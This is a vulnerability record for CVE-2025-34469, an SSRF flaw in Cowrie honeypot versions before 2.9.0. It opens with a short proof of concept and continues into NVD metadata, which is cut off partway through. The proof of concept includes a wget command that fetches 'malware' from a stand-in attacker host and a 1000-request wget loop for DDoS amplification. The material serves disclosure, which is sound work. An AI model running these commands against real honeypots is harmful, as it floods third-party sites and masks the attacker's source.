CVE-2025-34469

# CVE-2025-34469 PoC - Cowrie SSRF via wget # Target: Cowrie honeypot < 2.9.0 # Attacker connects to Cowrie honeypot via SSH/Telnet # Method 1: Using wget to trigger SSRF wget http://target-victim-site.com/large-file.iso # Method 2: Using curl to trigger SSRF curl http://victim-server.com/api/stress-endpoint # Method 3: Download file to internal resource wget -O /tmp/payload http://attacker-controlled-site.com/malware # Method 4: Multiple requests for DDoS amplification for i in {1..1000}; do wget -q http://target-site.com/index.html & done wait # The honeypot will execute real outbound HTTP requests, # masking the attacker's real IP and using honeypot's bandwidth.

{"cve": {"id": "CVE-2025-34469", "sourceIdentifier": "[email protected]", "published": "2025-12-31T22:15:49.003", "lastModified": "2026-01-13T22:10:41.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker’s true source address behind the honeypot’s IP."}, {"lang": "es", "value": "Las versiones de Cowrie anteriores a la 2.9.0 contienen una vulnerabilidad de falsificación de petición del lado del servidor (SSRF) en la implementación de shell emulado de wget y curl. En la configuración predeterminada del shell emulado, estas emulaciones de comandos realizan peticiones HTTP salientes reales a destinos proporcionados por el atacante. Dado que no se aplicaba ninguna limitación de velocidad de peticiones salientes, atacantes remotos no autenticados podían invocar repetidamente estos comandos para generar tráfico HTTP ilimitado hacia objetivos arbitrarios de terceros, permitiendo que el honeypot de Cowrie fuera abusado como un nodo de amplificación de denegación de servicio y enmascarando la verdadera dirección de origen del atacante detrás de la IP del honeypot."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cowrie:cowrie:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.9.0", "matchCriteriaId": "BD3F2D9F-8A2C-4993-93B1-5B9D26737EB4"}]}]}], "references": [{"url": "https://github.com/advisories/GHSA-83jg-m2pm-4jxj", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cowrie/cowrie/issues/2622", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/cowrie/cowrie/pull/2800", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/cowrie/cowrie/releases/tag/v2.9.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/cowrie-unrestricted-wget-curl-emulation-enables-ssrf-based-ddos-amplification", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/advisories/GHSA-83jg-m2pm-4jxj", "source": "134c704f-9b21-4f2e-91b3-4a467353 ... (truncated)